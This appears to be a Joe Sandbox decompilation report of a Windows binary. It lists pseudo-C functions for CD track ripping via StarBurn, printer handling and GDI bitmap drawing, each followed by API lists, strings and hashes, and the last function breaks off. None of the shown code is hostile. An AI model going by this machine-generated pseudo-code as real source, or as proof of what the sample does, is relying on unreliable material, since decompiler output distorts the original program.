      			E00484270(intOrPtr* __eax, void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __fp0) {
      				char _v8;
      				char _v12;
      				char _v16;
      				char _v20;
      				intOrPtr _v24;
      				char _v28;
      				char _v32;
      				char _v36;
      				char _v40;
      				char _v44;
      				intOrPtr _v48;
      				char _v52;
      				intOrPtr _v56;
      				char _v60;
      				signed int _v64;
      				intOrPtr _v68;
      				char _v72;
      				char _v76;
      				char _v80;
      				signed int _v84;
      				char _v88;
      				char* _t121;
      				void* _t124;
      				intOrPtr _t148;
      				signed char _t163;
      				intOrPtr _t165;
      				intOrPtr* _t166;
      				intOrPtr* _t169;
      				intOrPtr _t177;
      				signed char _t185;
      				char _t187;
      				intOrPtr _t189;
      				intOrPtr _t202;
      				intOrPtr _t228;
      				intOrPtr* _t237;
      				void* _t239;
      				intOrPtr _t257;
      				void* _t290;
      				intOrPtr _t293;
      				intOrPtr _t294;
      
      				_t302 = __fp0;
      				_t287 = __edi;
      				_t293 = _t294;
      				_t239 = 0xa;
      				do {
      					_push(0);
      					_push(0);
      					_t239 = _t239 - 1;
      				} while (_t239 != 0);
      				_push(_t239);
      				_push(__esi);
      				_push(__edi);
      				_t237 = __eax;
      				_push(_t293);
      				_push(0x4845fb);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t294;
      				E00482618(__eax, __eax, __edx, __edi, __esi, __fp0);
      				 *((char*)(_t237 + 0x14)) = 1;
      				_t121 =  *0x48f6f4; // 0x490c44
      				 *_t121 = 1;
      				_push(1);
      				L00465EFC();
      				L00465F0C();
      				_t124 = E0041A9F0( *((intOrPtr*)(_t237 + 0x20))) - 1;
      				if(_t124 < 0) {
      					L18:
      					E00409668(0x3b3e,  &_v88);
      					 *((intOrPtr*)( *_t237 + 0x14))();
      					_pop(_t257);
      					 *[fs:eax] = _t257;
      					_push(0x484602);
      					E00404A40( &_v88);
      					E00404A64( &_v76, 3);
      					E00404A64( &_v40, 6);
      					return E00404A40( &_v12);
      				}
      				_v16 = _t124 + 1;
      				_v8 = 0;
      				while(1) {
      					_t290 = E0047FA4C( *((intOrPtr*)(_t237 + 0x20)), _v8);
      					_t299 =  *((char*)(_t290 + 0x14)) - 1;
      					if( *((char*)(_t290 + 0x14)) != 1) {
      						E00404AD8( &_v12,  *((intOrPtr*)(_t290 + 0x10)));
      					} else {
      						E0047BE24(0x484614, _t237,  &_v20, _t299);
      						E00404D4C( &_v12, 0x484620, _v20);
      					}
      					if( *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x10)) + 0x18)) + 0xd4)) != 0) {
      						break;
      					}
      					E004091E4( &_v28);
      					E00404DC0();
      					_t148 =  *0x490c50; // 0x0
      					E0047FD7C(_t148, _t237, 0, _v24, _t287, _t290, _t302);
      					E004091E4( &_v36);
      					E00404D4C( &_v32, _v36, "Grabbing Track # ");
      					 *((intOrPtr*)( *_t237 + 0x14))( *((intOrPtr*)(_t290 + 0x10)), ", Output file: ", _v28, "CdvdBurnerGrabber_GrabTrack: Track #");
      					_push(1);
      					_push(0);
      					_push(1);
      					_push(1);
      					_push(E00404F00(_v12));
      					_push( *((intOrPtr*)(_t290 + 0xc)));
      					_t287 =  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x10)) + 0x18));
      					_push(_t287 + 0x4e8);
      					_push(_t287 + 0xe4);
      					_push(0x400);
      					_push(_t287 + 0xe8);
      					_t163 =  *(_t287 + 0xd8);
      					_push(_t163);
      					L00465EB4();
      					 *( *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x10)) + 0x18)) + 0xe0) = _t163;
      					_t165 =  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x10)) + 0x18));
      					__eflags =  *((char*)(_t165 + 0xe0));
      					if( *((char*)(_t165 + 0xe0)) == 0) {
      						_t166 =  *0x48f84c; // 0x490c48
      						E0047FAFC( *_t166, 0x64);
      					} else {
      						_v64 =  *( *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x10)) + 0x18)) + 0xe0) & 0x000000ff;
      						_v60 = 0;
      						_v56 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x10)) + 0x18)) + 0xe4));
      						_v52 = 0;
      						_v48 =  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x10)) + 0x18)) + 0xe8;
      						_v44 = 6;
      						E0040A164("StarBurn_CdvdBurnerGrabber_SetCDTextItem() failed, exception %d, status %d, text \"%s\"", 2,  &_v64,  &_v40);
      						E00404A94( *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x10)) + 0x18)) + 4, _v40);
      						_t228 =  *0x490c50; // 0x0
      						E0047FD7C(_t228, _t237, 0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x10)) + 0x18)) + 4)), _t287, _t290, _t302);
      						 *((char*)(_t237 + 0x14)) = 0;
      					}
      					__eflags =  *((char*)(_t290 + 0x14)) - 1;
      					if( *((char*)(_t290 + 0x14)) == 1) {
      						_t169 =  *0x48f84c; // 0x490c48
      						E0047FB14( *_t169, 0);
      						_push("StarWave_UncompressedFileCompress: ");
      						_push(_v12);
      						_push(" -> ");
      						_push( *((intOrPtr*)(_t290 + 0x10)));
      						_push(" with compression: ");
      						E004091E4( &_v72);
      						_push(_v72);
      						E00404DC0();
      						_t177 =  *0x490c50; // 0x0
      						E0047FD7C(_t177, _t237, 0, _v68, _t287, _t290, _t302);
      						_push( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x10)) + 0x18)) + 0xb8)));
      						_push(_t237);
      						_push(E0047DB78);
      						_push(0x2b110);
      						_push(E00404F00( *((intOrPtr*)(_t290 + 0x10))));
      						_t185 = E00404F00(_v12);
      						_push(_t185);
      						L00465F24();
      						 *( *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x10)) + 0x18)) + 0xe0) = _t185;
      						_t187 = E00409800(_v12, __eflags);
      						__eflags = _t187;
      						if(_t187 != 0) {
      							E00409834(_v12);
      						}
      						_t189 =  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x10)) + 0x18));
      						__eflags =  *((char*)(_t189 + 0xe0));
      						if( *((char*)(_t189 + 0xe0)) != 0) {
      							_v84 =  *( *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x10)) + 0x18)) + 0xe0) & 0x000000ff;
      							_v80 = 0;
      							E0040A164("StarBurn_StarWave_UncompressedFileCompress() failed, exception %d", 0,  &_v84,  &_v76);
      							E00404A94( *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x10)) + 0x18)) + 4, _v76);
      							__eflags = 0;
      							_t202 =  *0x490c50; // 0x0
      							E0047FD7C(_t202, _t237, 0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x10)) + 0x18)) + 4)), _t287, _t290, _t302);
      							 *((char*)(_t237 + 0x14)) = 0;
      							E0040CBEC( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x10)) + 0x18)) + 4)), 1);
      							E004043D0();
      						}
      					}
      					_v8 = _v8 + 1;
      					_t108 =  &_v16;
      					 *_t108 = _v16 - 1;
      					__eflags =  *_t108;
      					if(__eflags != 0) {
      						continue;
      					} else {
      						goto L18;
      					}
      				}
      				 *((intOrPtr*)( *_t237 + 0x14))();
      				goto L18;
      			}

      APIs
      • StarBurn_SetFastReadTOC.STARBURN(00000001,00000000,004845FB,?,?,?,?,00000009,00000000,00000000), ref: 004842A8
      • StarBurn_GetFastReadTOC.STARBURN(00000001,00000000,004845FB,?,?,?,?,00000009,00000000,00000000), ref: 004842AD
      • StarBurn_CdvdBurnerGrabber_GrabTrack.STARBURN(?,?,00000400,?,?,?,00000000,00000001,00000001,00000000,00000001), ref: 004843C9
      • StarBurn_StarWave_UncompressedFileCompress.STARBURN(00000000,00000000,0002B110,Function_0007DB78,?,?,?, with compression: ,?, -> ,?,StarWave_UncompressedFileCompress: ,?,?,00000400,?), ref: 004844FF
      Strings
      • Grabbing canceled!, xrefs: 0048431E
      • StarWave_UncompressedFileCompress: , xrefs: 0048448D
      • CdvdBurnerGrabber_GrabTrack: Track #, xrefs: 0048432F
      • -> , xrefs: 00484495
      • , Output file: , xrefs: 00484342
      • Grabbing Track # , xrefs: 00484377
      • with compression: , xrefs: 0048449D
      • StarBurn_StarWave_UncompressedFileCompress() failed, exception %d, xrefs: 00484550
      • .wav, xrefs: 004842F6
      • StarBurn_CdvdBurnerGrabber_SetCDTextItem() failed, exception %d, status %d, text "%s", xrefs: 0048442E
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Star$Burn_$FastRead$BurnerCdvdCompressFileGrabGrabber_TrackUncompressedWave_
      • String ID: -> $ with compression: $, Output file: $.wav$CdvdBurnerGrabber_GrabTrack: Track #$Grabbing Track # $Grabbing canceled!$StarBurn_CdvdBurnerGrabber_SetCDTextItem() failed, exception %d, status %d, text "%s"$StarBurn_StarWave_UncompressedFileCompress() failed, exception %d$StarWave_UncompressedFileCompress:
      • API String ID: 4052944251-577030503
      • Opcode ID: bb6ec19f933283665ddc7c244471772de827383cc4dd08eb64c38165ba5b0c32
      • Instruction ID: 8c6f94eb419f18c1f99b6b37dbd38fc82ffd7b951bff87a90bc80ce016348b60
      • Opcode Fuzzy Hash: bb6ec19f933283665ddc7c244471772de827383cc4dd08eb64c38165ba5b0c32
      • Instruction Fuzzy Hash: 78B16C746002459FCB04EFA8D881B9E77F5BF48304F1049AAE905AB3A6C778ED45CB68
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 69%
      			E0042F52C(void* __eax, void* __ebx, intOrPtr __ecx, char __edx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8) {
      				char _v8;
      				intOrPtr _v12;
      				intOrPtr _v16;
      				intOrPtr* _v20;
      				char _v176;
      				char _v180;
      				char _v184;
      				char _v188;
      				intOrPtr _v192;
      				char _v196;
      				char _v200;
      				void* _t73;
      				long _t76;
      				intOrPtr _t85;
      				long _t95;
      				void* _t96;
      				long _t98;
      				intOrPtr _t112;
      				void* _t134;
      				void* _t135;
      				void* _t136;
      				intOrPtr _t138;
      				intOrPtr _t152;
      				void* _t169;
      				void* _t170;
      				void* _t171;
      				void* _t173;
      				void* _t176;
      
      				_t167 = __edi;
      				_push(__ebx);
      				_push(__esi);
      				_push(__edi);
      				_v180 = 0;
      				_v184 = 0;
      				_v12 = __ecx;
      				_v8 = __edx;
      				_t173 = __eax;
      				_t134 = _a4;
      				_push(_t176);
      				_push(0x42f76d);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t176 + 0xffffff3c;
      				E0042F394(__eax, 0);
      				_t73 =  *(_t173 + 0x28);
      				if(_t134 != _t73) {
      					 *(_t173 + 0x28) = _t134;
      				}
      				_t135 =  *(_t173 + 0x28);
      				if(_t135 != 0) {
      					GlobalFix(_t135);
      					_t167 = _t73;
      					 *(_t173 + 0x24) = _t73;
      					E0042F4F0(_t173,  *((intOrPtr*)(_t73 + 0x28)));
      				}
      				E0042FC90(_t173);
      				_t76 =  *(_t173 + 0x2c);
      				if(_t76 != 0) {
      					_push(_t76);
      					L0042ECF0();
      					 *(_t173 + 0x2c) = 0;
      				}
      				E0042F268(_t173, _t135, 0, _t167, _t173);
      				_v16 = 0xffffffff;
      				_v20 = E0042F804(_t173, _t135, _t167, _t173);
      				_t169 =  *((intOrPtr*)( *_v20 + 0x14))() - 1;
      				if(_t169 < 0) {
      					L13:
      					if(_v16 == 0xffffffff) {
      						_v16 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t173 + 0x10)))) + 0x14))();
      						_t112 =  *0x48f5ec; // 0x423b58
      						E00406A3C(_t112, _v12,  &_v184);
      						_v200 = _v8;
      						_v196 = 6;
      						_v192 = _a8;
      						_v188 = 6;
      						E0040A164(_v184, 1,  &_v200,  &_v180);
      						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t173 + 0x10)))) + 0x3c))(E0042EF14(_v12, 1, _a8, _v8));
      					}
      					 *((intOrPtr*)(_t173 + 0x14)) = _v16;
      					_push(0);
      					_push(_t173 + 0x2c);
      					_t85 = _v8;
      					_push(_t85);
      					L0042ED08();
      					if(_t85 != 0) {
      						if( *(_t173 + 0x28) == 0) {
      							_push(0);
      							_push( &_v176);
      							_push( &_v176);
      							_push(_v8);
      							_t95 =  *(_t173 + 0x2c);
      							_push(_t95);
      							_push(0);
      							L0042ECF8();
      							_t96 = GlobalAlloc(0x42, _t95);
      							_t136 = _t96;
      							 *(_t173 + 0x28) = _t136;
      							if(_t136 != 0) {
      								GlobalFix(_t136);
      								_t170 = _t96;
      								 *(_t173 + 0x24) = _t170;
      								_push(2);
      								_push(_t170);
      								_push(_t170);
      								_push(_v8);
      								_t98 =  *(_t173 + 0x2c);
      								_push(_t98);
      								_push(0);
      								L0042ECF8();
      								if(_t98 < 0) {
      									GlobalUnWire( *(_t173 + 0x28));
      									GlobalFree( *(_t173 + 0x28));
      									 *(_t173 + 0x28) = 0;
      									 *(_t173 + 0x24) = 0;
      								}
      							}
      						}
      						if( *(_t173 + 0x28) != 0) {
      							E0042F4F0(_t173,  *((intOrPtr*)( *(_t173 + 0x24) + 0x28)));
      						}
      					}
      					_pop(_t152);
      					 *[fs:eax] = _t152;
      					_push(0x42f774);
      					return E00404A64( &_v184, 2);
      				} else {
      					_t171 = _t169 + 1;
      					_t138 = 0;
      					while(E0042EF74( *((intOrPtr*)( *_v20 + 0x18))(), _t138, _v8, _t173, _a8) == 0) {
      						_t138 = _t138 + 1;
      						_t171 = _t171 - 1;
      						if(_t171 != 0) {
      							continue;
      						}
      						goto L13;
      					}
      					E00404C38( *((intOrPtr*)( *_v20 + 0x18))() + 0xc, _a8);
      					_v16 = _t138;
      					goto L13;
      				}
      			}

      APIs
      • GlobalUnWire.KERNEL32(?), ref: 0042F574
      • GlobalFree.KERNEL32 ref: 0042F57D
      • GlobalFix.KERNEL32 ref: 0042F592
      • 737ED660.WINSPOOL.DRV(?,00000000,0042F76D,?,00000000,00000000,00000000), ref: 0042F5B5
      • 738030C0.WINSPOOL.DRV(?,?,00000000,?,00000000,00000000,00000000), ref: 0042F6BB
      • 738015A0.WINSPOOL.DRV(00000000,?,?,?,?,00000000,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 0042F6E8
      • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 0042F6F0
      • GlobalFix.KERNEL32 ref: 0042F6FF
      • 738015A0.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002,00000000,00000042,00000000,00000000,?,?,?,?,00000000), ref: 0042F717
      • GlobalUnWire.KERNEL32(00000000), ref: 0042F724
      • GlobalFree.KERNEL32 ref: 0042F72D
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Global$738015FreeWire$738030AllocD660.
      • String ID: X;B$B
      • API String ID: 3219947479-3409252510
      • Opcode ID: 9b84f64c0619e1b0be432098d5e6a555225b6a8b71958c4fd278bad5face3bc0
      • Instruction ID: ea043fd258ca3b0cf3d5dfe57d4600f1f5799c7de3d824af7fb817a2158fd3f1
      • Opcode Fuzzy Hash: 9b84f64c0619e1b0be432098d5e6a555225b6a8b71958c4fd278bad5face3bc0
      • Instruction Fuzzy Hash: 48714A70B00614AFCB10DF6AD880A4BB7F9AF48314F90467AE909D7351DB34ED45CB59
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 71%
      			E0042AC18(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
      				intOrPtr _v8;
      				void* _v12;
      				char _v13;
      				struct tagPOINT _v21;
      				struct HDC__* _v28;
      				void* _v32;
      				intOrPtr _t78;
      				struct HDC__* _t80;
      				signed int _t82;
      				signed int _t83;
      				signed int _t84;
      				char _t85;
      				void* _t92;
      				struct HDC__* _t115;
      				void* _t136;
      				struct HDC__* _t160;
      				intOrPtr* _t164;
      				intOrPtr _t172;
      				intOrPtr _t176;
      				intOrPtr _t178;
      				intOrPtr _t180;
      				int* _t184;
      				intOrPtr _t186;
      				void* _t188;
      				void* _t189;
      				intOrPtr _t190;
      
      				_t165 = __ecx;
      				_t188 = _t189;
      				_t190 = _t189 + 0xffffffe4;
      				_t184 = __ecx;
      				_v8 = __edx;
      				_t164 = __eax;
      				_t186 =  *((intOrPtr*)(__eax + 0x28));
      				_t172 =  *0x42ae64; // 0xf
      				E00426BD4(_v8, __ecx, _t172);
      				E0042B1A8(_t164);
      				_v12 = 0;
      				_v13 = 0;
      				_t78 =  *((intOrPtr*)(_t186 + 0x10));
      				if(_t78 != 0) {
      					_push(0xffffffff);
      					_push(_t78);
      					_t160 =  *(_v8 + 4);
      					_push(_t160);
      					L00407420();
      					_v12 = _t160;
      					_push( *(_v8 + 4));
      					L004073F0();
      					_v13 = 1;
      				}
      				_push(0xc);
      				_t80 =  *(_v8 + 4);
      				_push(_t80);
      				L00407348();
      				_push(_t80);
      				_push(0xe);
      				_t82 =  *(_v8 + 4);
      				L00407348();
      				_t83 = _t82;
      				_t84 = _t83 * _t82;
      				if(_t84 > 8) {
      					L4:
      					_t85 = 0;
      				} else {
      					_t165 =  *(_t186 + 0x28) & 0x0000ffff;
      					if(_t84 < ( *(_t186 + 0x2a) & 0x0000ffff) * ( *(_t186 + 0x28) & 0x0000ffff)) {
      						_t85 = 1;
      					} else {
      						goto L4;
      					}
      				}
      				if(_t85 == 0) {
      					if(E0042AFA4(_t164) == 0) {
      						SetStretchBltMode(E00426B00(_v8), 3);
      					}
      				} else {
      					GetBrushOrgEx( *(_v8 + 4),  &_v21);
      					SetStretchBltMode( *(_v8 + 4), 4);
      					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
      				}
      				_push(_t188);
      				_push(0x42ae54);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t190;
      				if( *((intOrPtr*)( *_t164 + 0x28))() != 0) {
      					E0042B148(_t164, _t165);
      				}
      				_t92 = E0042AEE8(_t164);
      				_t176 =  *0x42ae64; // 0xf
      				E00426BD4(_t92, _t165, _t176);
      				if( *((intOrPtr*)( *_t164 + 0x28))() == 0) {
      					StretchBlt( *(_v8 + 4),  *_t184, _t184[1], _t184[2] -  *_t184, _t184[3] - _t184[1],  *(E0042AEE8(_t164) + 4), 0, 0,  *(_t186 + 0x1c),  *(_t186 + 0x20),  *(_v8 + 0x20));
      					_pop(_t178);
      					 *[fs:eax] = _t178;
      					_push(0x42ae5b);
      					if(_v13 != 0) {
      						_push(0xffffffff);
      						_push(_v12);
      						_t115 =  *(_v8 + 4);
      						_push(_t115);
      						L00407420();
      						return _t115;
      					}
      					return 0;
      				} else {
      					_v32 = 0;
      					_v28 = 0;
      					_push(_t188);
      					_push(0x42ade9);
      					_push( *[fs:eax]);
      					 *[fs:eax] = _t190;
      					L00407280();
      					_v28 = E00426EF8(0);
      					_v32 = SelectObject(_v28,  *(_t186 + 0xc));
      					E0042709C( *(_v8 + 4), _t164, _t184[1],  *_t184, _t184, _t186, 0, 0, _v28,  *(_t186 + 0x20),  *(_t186 + 0x1c), 0, 0,  *(E0042AEE8(_t164) + 4), _t184[3] - _t184[1], _t184[2] -  *_t184);
      					_t136 = 0;
      					_t180 = 0;
      					 *[fs:eax] = _t180;
      					_push(0x42ae2e);
      					if(_v32 != 0) {
      						_t136 = SelectObject(_v28, _v32);
      					}
      					if(_v28 != 0) {
      						return DeleteDC(_v28);
      					}
      					return _t136;
      				}
      			}

      APIs
        • Part of subcall function 0042B1A8: 73BEAC50.USER32(00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B1FE
        • Part of subcall function 0042B1A8: 73BEAD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B213
        • Part of subcall function 0042B1A8: 73BEAD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B21D
        • Part of subcall function 0042B1A8: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B241
        • Part of subcall function 0042B1A8: 73BEB380.USER32(00000000,00000000,00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B24C
      • 73BEB410.GDI32(?,?,000000FF), ref: 0042AC5A
      • 73BEB150.GDI32(?,?,?,000000FF), ref: 0042AC69
      • 73BEAD70.GDI32(?,0000000C), ref: 0042AC7B
      • 73BEAD70.GDI32(?,0000000E,00000000,?,0000000C), ref: 0042AC8A
      • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 0042ACBD
      • SetStretchBltMode.GDI32(?,00000004), ref: 0042ACCB
      • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 0042ACE3
      • SetStretchBltMode.GDI32(00000000,00000003), ref: 0042AD00
      • 73BEA590.GDI32(00000000,00000000,0042ADE9,?,?,0000000E,00000000,?,0000000C), ref: 0042AD60
      • SelectObject.GDI32(?,?), ref: 0042AD75
      • SelectObject.GDI32(?,00000000), ref: 0042ADD4
      • DeleteDC.GDI32(00000000), ref: 0042ADE3
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: BrushModeObjectSelectStretch$A590B150B380B410CreateDeleteHalftonePalette
      • String ID:
      • API String ID: 2051775979-0
      • Opcode ID: 2153924e24b22a56ac1719e09d13ab1c4a78aa3ddfe25e82f58c32ba98b6ed15
      • Instruction ID: 629c67936347ef5ad9bcc2e9d2771490413ab9b282883e3b01fe6ec5c36d71af
      • Opcode Fuzzy Hash: 2153924e24b22a56ac1719e09d13ab1c4a78aa3ddfe25e82f58c32ba98b6ed15
      • Instruction Fuzzy Hash: CC717875B04215AFCB10DFA9D985F5EBBF8AF08304F51846AB908E7282C638ED10CB55
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 51%
      			E00426F08(struct HDC__* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
      				void* _v8;
      				int _v12;
      				int _v16;
      				void* _v20;
      				int _v24;
      				struct HDC__* _v28;
      				struct HDC__* _v32;
      				int _v48;
      				int _v52;
      				void _v56;
      				int _t37;
      				void* _t41;
      				int _t43;
      				void* _t47;
      				void* _t72;
      				intOrPtr _t79;
      				intOrPtr _t80;
      				void* _t85;
      				void* _t87;
      				void* _t88;
      				intOrPtr _t89;
      
      				_t87 = _t88;
      				_t89 = _t88 + 0xffffffcc;
      				asm("movsd");
      				asm("movsd");
      				_t71 = __ecx;
      				_v8 = __eax;
      				_push(0);
      				L00407280();
      				_v28 = __eax;
      				_push(0);
      				L00407280();
      				_v32 = __eax;
      				_push(_t87);
      				_push(0x427056);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t89;
      				_t37 = GetObjectA(_v8, 0x18,  &_v56);
      				if(__ecx == 0) {
      					_push(0);
      					L00407658();
      					_v24 = _t37;
      					if(_v24 == 0) {
      						E00426E50(__ecx);
      					}
      					_push(_t87);
      					_push(0x426fc5);
      					_push( *[fs:eax]);
      					 *[fs:eax] = _t89;
      					_push(_v12);
      					_push(_v16);
      					_t41 = _v24;
      					_push(_t41);
      					L00407278();
      					_v20 = _t41;
      					if(_v20 == 0) {
      						E00426E50(_t71);
      					}
      					_pop(_t79);
      					 *[fs:eax] = _t79;
      					_push(0x426fcc);
      					_t43 = _v24;
      					_push(_t43);
      					_push(0);
      					L004078C0();
      					return _t43;
      				} else {
      					_push(0);
      					_push(1);
      					_push(1);
      					_push(_v12);
      					_t47 = _v16;
      					_push(_t47);
      					L00407268();
      					_v20 = _t47;
      					if(_v20 != 0) {
      						_t72 = SelectObject(_v28, _v8);
      						_t85 = SelectObject(_v32, _v20);
      						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
      						if(_t72 != 0) {
      							SelectObject(_v28, _t72);
      						}
      						if(_t85 != 0) {
      							SelectObject(_v32, _t85);
      						}
      					}
      					_pop(_t80);
      					 *[fs:eax] = _t80;
      					_push(0x42705d);
      					DeleteDC(_v28);
      					return DeleteDC(_v32);
      				}
      			}

      APIs
      • 73BEA590.GDI32(00000000), ref: 00426F1F
      • 73BEA590.GDI32(00000000,00000000), ref: 00426F29
      • GetObjectA.GDI32(?,00000018,?), ref: 00426F49
      • 73BEA410.GDI32(?,?,00000001,00000001,00000000,00000000,00427056,?,00000000,00000000), ref: 00426F60
      • 73BEAC50.USER32(00000000,00000000,00427056,?,00000000,00000000), ref: 00426F6C
      • 73BEA520.GDI32(00000000,?,?,00000000,00426FC5,?,00000000,00000000,00427056,?,00000000,00000000), ref: 00426F99
      • 73BEB380.USER32(00000000,00000000,00426FCC,00000000,00426FC5,?,00000000,00000000,00427056,?,00000000,00000000), ref: 00426FBF
      • SelectObject.GDI32(?,?), ref: 00426FDA
      • SelectObject.GDI32(?,00000000), ref: 00426FE9
      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 00427015
      • SelectObject.GDI32(?,00000000), ref: 00427023
      • SelectObject.GDI32(?,00000000), ref: 00427031
      • DeleteDC.GDI32(?), ref: 00427047
      • DeleteDC.GDI32(?), ref: 00427050
      Similarity
      • API ID: Object$Select$A590Delete$A410A520B380Stretch
      • String ID:
      • API String ID: 956127455-0
      • Opcode ID: f9c81fb34e2f4741f8cd8aff4a8ff08aac220c643414f968572fb8cca271ea75
      • Instruction ID: 4de25d68d9a0aa1b1a6b9f5be952b23dbda794e73a386f216163f357df0946aa
      • Opcode Fuzzy Hash: f9c81fb34e2f4741f8cd8aff4a8ff08aac220c643414f968572fb8cca271ea75
      • Instruction Fuzzy Hash: 0D413E71E08219AFDB50EBE9DD42FAFB7BCEB09704F51046AF604F7280C67969008765
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 55%
      			E0044BFB0(intOrPtr* __eax, intOrPtr __edx) {
      				intOrPtr* _v8;
      				intOrPtr _v12;
      				struct HDC__* _v16;
      				struct tagRECT _v32;
      				struct tagRECT _v48;
      				void* _v64;
      				struct HDC__* _t120;
      				void* _t171;
      				intOrPtr* _t193;
      				intOrPtr* _t196;
      				intOrPtr _t205;
      				void* _t208;
